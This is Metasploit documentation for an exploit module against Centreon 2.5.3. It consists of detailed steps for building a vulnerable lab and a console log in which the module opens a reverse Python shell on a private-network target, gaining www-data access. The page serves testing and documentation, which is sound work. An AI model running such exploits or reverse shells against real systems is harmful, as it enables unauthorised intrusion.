CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/http/centreon_useralias_exec.md
Views: 1904

Vulnerable Application

  1. Exploit-db

  2. Archived Copy: github

Creating A Testing Environment

Creating a testing environment for this application contained many steps, so I figured I would document the process here.

  1. Create a fresh install of Ubuntu 16.04. I used a LAMP install. My user was centreon

  2. Install php5.6 askubuntu

sudo apt purge `dpkg -l | grep php| awk '{print $2}' |tr "\n" " "`
sudo add-apt-repository ppa:ondrej/php
sudo apt-get install php5.6
sudo apt-get install php5.6-mbstring php5.6-mcrypt php5.6-mysql php5.6-xml php5.6-gd php5.6-ldap php5.6-sqlite3
sudo apt-get install build-essential cmake librrd-dev libqt4-dev libqt4-sql-mysql libgnutls28-dev python-minimal
sudo apt-get install tofrodos bsd-mailx lsb-release mysql-server libmysqlclient-dev apache2 php-pear rrdtool librrds-perl libconfig-inifiles-perl libcrypt-des-perl libdigest-hmac-perl libgd-gd2-perl snmp snmpd libnet-snmp-perl libsnmp-perl
  select OK
  select No Configuration
sudo apt-get install snmp-mibs-downloader

  1. Enable php5.6 in Apache with a2enmod, disable php7.0 with a2dismod

a2enmod php5.6
a2dismod php7.0

  1. Restart apache with sudo apache2ctl restart

  2. Install Nagios Plugins starting at step 6. The plugins link is broken, utilize nagios-plugins-2.1.1.tar.gz instead

wget http://www.nagios-plugins.org/download/nagios-plugins-2.1.1.tar.gz
tar xvf nagios-plugins-2.1.1.tar.gz
cd nagios-plugins-2.1.1/
./configure
make
sudo make install

5.1 If during make, you get an sslv3 method not found error (https://support.nagios.com/forum/viewtopic.php?f=35&t=36601&p=168235&hilit=SSLv3#p168235)

--- plugins/sslutils.c.orig   2016-01-14 20:02:06.419867000 +0100
+++ plugins/sslutils.c   2016-01-14 20:01:36.091492000 +0100
@@ -70,8 +70,13 @@
#endif
      break;
   case 3: /* SSLv3 protocol */
+#if defined(OPENSSL_NO_SSL3)
+      printf(("%s\n", _("CRITICAL - SSL protocol version 3 is not supported by your SSL library.")));
+      return STATE_CRITICAL;
+#else
      method = SSLv3_client_method();
      ssl_options = SSL_OP_NO_SSLv2 | SSL_OP_NO_TLSv1;
+#endif
      break;
   default: /* Unsupported */
      printf("%s\n", _("CRITICAL - Unsupported SSL protocol version."));

  1. Install Centreon clib

cd ~
git clone https://github.com/centreon/centreon-clib
cd centreon-clib/build
cmake .
make
sudo make install

  1. Install Centreon Broker

cd ~
git clone https://github.com/centreon/centreon-broker
cd centreon-broker/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install

  1. Install Centreon Engine

cd ~
git clone https://github.com/centreon/centreon-engine
cd centreon-engine/build/
cmake -DWITH_STARTUP_DIR=/etc/init.d -DWITH_STARTUP_SCRIPT=sysv .
make
sudo make install

  1. Now install Centreon Web but only the command line portion.

sudo mkdir /var/log/centreon-engine
cd ~
sudo pear install XML_RPC-1.4.5
(may need to install php-xml)
wget https://www.exploit-db.com/apps/bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
tar vxf bf269a17dd99215e6dc5d7755b521c21-centreon-2.5.3.tar.gz
cd centreon-2.5.3
sudo ./install.sh -i
  <enter>
  q
  y
  y
  y
  y
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  y
  <enter>
  <enter>
  <enter>
  centreon
  <enter>
  /var/log/centreon-engine
  /home/centreon/nagios-plugins-2.1.1/plugins
  <enter>
  /etc/init.d/centengine
  /usr/local/bin/centengine
  /usr/local/etc/
  /usr/local/etc/
  /etc/init.d/centengine
  <enter>
  y
  y
  y
  <enter>
  y
  <enter>
  <enter>
  y
  y
  <enter>
  y
  y
  <enter>
  y
  <enter>
  <enter>
  y
  y

  1. Fix apache config

sudo cp /etc/apache2/conf.d/centreon.conf /etc/apache2/conf-available/
sudo sed -i 's/Order allow,deny/Require all granted/' /etc/apache2/conf-available/centreon.conf
sudo sed -i 's/allow from all//' /etc/apache2/conf-available/centreon.conf
sudo a2enconf centreon
sudo service apache2 reload

  1. Configure via website. Browse to [removed]/centreon

next
next
select centreon-engine
  /usr/local/lib/centreon-engine
  /usr/local/bin/centenginestats
  /usr/local/lib/centreon-engine
  /usr/local/lib/centreon-engine
  /usr/local/lib/centreon-engine
  next
select centreon-broker
  /usr/local/lib/centreon-broker
  /usr/local/lib/cbmod.so
  /usr/local/lib/centreon-broker
  /usr/local/lib/centreon-broker
  /usr/local/lib/centreon-broker
  next
Pick whatever details about your user you want, next
Fill in mysql Root password, next
next
next
finish

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/linux/http/centreon_useralias_exec

  4. Do: set payload

  5. Do: set rhost

  6. Do: check

  7. Do: run

  8. You should get a shell.

Scenarios

Just a standard run.

    msf > use exploit/linux/http/centreon_useralias_exec
    msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
    payload => cmd/unix/reverse_python
    msf exploit(centreon_useralias_exec) > set lhost 192.168.2.229
    lhost => 192.168.2.229
    msf exploit(centreon_useralias_exec) > set rhost 192.168.2.85
    rhost => 192.168.2.85
    msf exploit(centreon_useralias_exec) > set verbose true
    verbose => true
    msf exploit(centreon_useralias_exec) > check
    [+] Version Detected: 2.5.3
    [*] 192.168.2.85:80 The target appears to be vulnerable.
    msf exploit(centreon_useralias_exec) > exploit
    [*] Started reverse TCP handler on 192.168.2.229:4444 
    [*] Sending malicious login
    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.85:36792) at 2016-06-11 20:44:57 -0400
    whoami
    www-data
    uname -a
    Linux centreon 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux